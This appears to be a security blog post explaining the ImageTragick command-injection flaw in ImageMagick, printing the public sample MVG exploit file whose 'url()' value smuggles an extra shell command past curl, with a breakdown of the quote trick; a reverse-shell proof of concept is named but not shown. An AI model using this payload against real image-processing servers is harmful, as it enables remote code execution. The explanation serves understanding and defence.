ImageMagick Proof Of Concept – Remote Shell

Background

ImageMagick is a server-side image processing engine which is very widely used. Its common functions include compressing and resizing submitted images (like profile pictures) to standardize files in the server's database. Many popular image processing plugins in PHP, Ruby's RMagick, and other frameworks rely on ImageMagick's platform.

Important: This post is great for securing systems using ImageMagick: Clearing Up Some Misconceptions Around ImageMagick

Understanding the Vulnerability

The core vulnerability stems from insufficient filtering of file contents, which enables potential remote code execution. A particularly concerning default behavior states: "If I don't understand 'file.format', try to run it as a .svg or .mvg". These vector graphic formats can include calls to remote files, with processing order determined by the delegates.xml and policy.xml configuration files.

How the Exploit Works

The vulnerability exists in how remote file calls are processed and parsed. When ImageMagick makes these calls using curl/wget, the parsing allows attackers to use alternative quotation styles to terminate the wget/curl request and inject their own commands.

Basic ImageMagick Operation

For example, ImageMagick typically processes image conversions using commands like:

convert inputfile.png outputfile.jpg

The Vulnerability

The exploit works by uploading a file named 'inputfile.png' that actually contains MVG format text data. Here's the sample exploit code from ImageTragick:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

Technical Deep Dive

This exploit works because:

  1. The file can be created in any text editor and simply renamed to .png
  2. When ImageMagick fails to process it as PNG, it attempts other formats specified in policy.xml
  3. When processed as MVG, the text commands are executed
  4. The 'fill' command's 'url' function feeds its contents to curl

Command Breakdown

The exploit string:

url(https://example.com/image.jpg";|ls "-la)

Can be broken into these components:

curl https://example.com/image.jpg  # Initial intended command
ls -la                             # Injected command

Understanding the Quote Manipulation

The exploit leverages how ImageMagick constructs the curl command:

  1. Initial structure: curl "
  2. Intended completion: curl "your.url.here"
  3. Exploit structure: curl "https://example.com/image.jpg" ; ls -la"

Proof of Concept

I created a proof of concept that establishes a reverse shell to a remote host:

Remote Shell Proof of Concept

Please feel free to leave any questions, comments, or corrections in the comments section below!

Footnotes

1 MVG (Magick Vector Graphics) is ImageMagick's native vector graphics format.